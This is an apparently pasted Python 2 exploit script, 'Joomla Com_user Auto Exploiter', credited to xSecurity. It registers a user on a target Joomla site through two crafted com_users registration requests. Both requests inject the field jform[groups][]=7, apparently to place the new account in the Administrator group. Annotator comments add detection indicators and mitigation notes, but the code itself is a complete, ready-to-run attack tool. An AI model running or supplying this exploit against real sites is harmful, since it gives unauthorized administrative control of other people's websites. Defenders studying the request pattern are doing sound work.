Leon-HDz

Joomla Com_user Auto Exploiter

Oct 30th, 2014
  3.     #!/usr/bin/python
  4.     # Joomla Com_User Auto Exploit =D
  5.     # By xSecurity
  6.      
  7.     import requests as sec4ever, re, urllib, sys, os
  8.     from threading import Thread
  9.     from time import sleep
  10.     def cls():
                  # Clears the terminal by shelling out. The boolean os.name == 'nt'
                  # indexes the list (False -> 'clear', True -> 'cls'), so Windows
                  # gets 'cls' and every other platform gets 'clear'.
  11.             os.system(['clear','cls'][os.name =='nt'])
  12.      
  13.     cls()
          # The screen is cleared, then a static banner is printed with a Python 2
          # print statement. The banner holds credits and a setup note only; it
          # carries no program logic.
  14.     print '''
  15.          __                      _ _        
  16.    __  __/ _\ ___  ___ _   _ _ __(_) |_ _   _
  17.    \ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
  18.    >  < _\ \ __/ (__| |_| | |  | | |_| |_| |
  19.    /_/\_\\__/\___|\___|\__,_ |_|  |_|\__|\__, |
  20.                                        |___/Joomla [Com_User] Auto Exploit =D
  21.    #Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
  22.    #Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
  23.    Special For My Lov3r Cyber-Crystal
  24.    #Note: U Need Install Requests Package: http://www.youtube.com/ watch?v=Ng5T18HyA-Q'''
  25.      
          # Hard-coded filler string. one() receives it as the password
          # confirmation, so the first registration attempt is sent with
          # password2 != password1 unless the chosen password happens to equal
          # this exact string.
          # Defender note: because it is a fixed constant, this value in a captured
          # registration POST body is a usable indicator for this specific script.
  26.     pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
  27.     def one(target,pwd1,pwd2,email):
                  # First of two registration submissions. Fetches the com_users
                  # registration page, then POSTs a registration whose confirmation
                  # password is the pwd2 argument (the caller passes the module-level
                  # constant, so the two password fields normally differ) and which
                  # carries an extra jform[groups][] field.
                  # `user` is not a parameter: it is read from the module-level name
                  # assigned in the argv block, and xsec is the module-level session.
                  # Returns None; neither response is inspected.
  28.             # Wrong Password
  29.             x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
                  # Captures the name attribute of every hidden input whose value is
                  # "1"; the first match is echoed back as a form field further down.
                  # Presumably this is the site's per-session anti-CSRF token -- confirm.
                  # token[0] raises IndexError when the page has no such input.
  30.             token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
  31.             post = {}
  32.             post["jform[name]"] = 'xSecurity'
  33.             post["jform[username]"] = user
  34.             post["jform[password1]"] = pwd1
  35.             post["jform[password2]"] = pwd2
  36.             post["jform[email1]"] = email
  37.             post["jform[email2]"] = email
                  # NOTE(review): a self-registration request has no reason to carry a
                  # group assignment, so this field is the anomaly to alert on or to
                  # reject at a WAF. In a default Joomla install group id 7 is believed
                  # to be Administrator -- confirm against the site's usergroups table.
  38.             post["jform[groups][]"] = "7"
  39.             post["option"] = "com_users"
  40.             post["task"] = "registration.register"
  41.             post[token[0]] = "1"
  42.             p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
  43.             x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
                  # Defender note: in access logs this function shows up as GET
                  # registration, POST registration, GET ...layout=complete under one
                  # session cookie, and the display name submitted is always 'xSecurity'.
  44.      
  45.     def exploit(target,pwd1,pwd2,email):
                  # Second submission, sent on the same session as one(). The fields are
                  # identical except that password2 is set to pwd1 (the pwd2 parameter
                  # is unused here), so the confirmation matches this time. The
                  # "Wrong Password" comment below is carried over from one() and does
                  # not describe this function. Returns None; responses are discarded.
                  # NOTE(review): a rejected submission followed by a valid one that
                  # still carries jform[groups][] suggests the flaw being probed is
                  # server-side reuse of form data from the failed attempt -- confirm
                  # against the vendor advisory for the installed com_users version.
                  # Mitigation is on the server: keep Joomla patched, turn off
                  # self-registration where it is not needed, and review recently
                  # created accounts that sit in privileged groups.
  46.             # Wrong Password
  47.             x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
                  # Same hidden-input capture as in one(); token[0] raises IndexError
                  # when nothing matches.
  48.             token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
  49.             post = {}
  50.             post["jform[name]"] = 'xSecurity'
  51.             post["jform[username]"] = user
  52.             post["jform[password1]"] = pwd1
  53.             post["jform[password2]"] = pwd1
  54.             post["jform[email1]"] = email
  55.             post["jform[email2]"] = email
  56.             post["jform[groups][]"] = "7"
  57.             post["option"] = "com_users"
  58.             post["task"] = "registration.register"
  59.             post[token[0]] = "1"
  60.             p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
  61.             x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
  62.      
  63.     xsec = sec4ever.session()
          # One requests session for the whole run (sec4ever is the alias given to
          # requests in the import line), so cookies set during one() are sent again
          # by exploit().
          # Exactly four command-line arguments are required: base URL, username,
          # password and e-mail address; anything else prints the usage line.
  64.     if len(sys.argv) == 5:
  65.             target = sys.argv[1]
  66.             user = sys.argv[2]
  67.             pwd1 = sys.argv[3]
  68.             email = sys.argv[4]
  69.             one(target,pwd1,pwd2,email)
                  # exploit() has no return statement, so ex is always None and is
                  # never read afterwards.
  70.             ex = exploit(target,pwd1,pwd2,email)
                  # Printed unconditionally: no server response is checked anywhere, so
                  # this message does not show that an account was actually created.
  71.             print '[*] Go To Your Email & Active Then Login =D\nUsername: '+user+' & Password: '+pwd1
  72.     else:
  73.             print "Usage: python tool.py http://target.com/j0s/ youruser yourpass yourmail"